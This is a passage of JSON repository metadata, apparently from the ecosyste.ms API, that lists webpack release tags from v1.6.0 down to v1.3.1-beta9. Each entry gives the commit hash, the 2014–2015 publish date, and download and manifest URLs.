/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack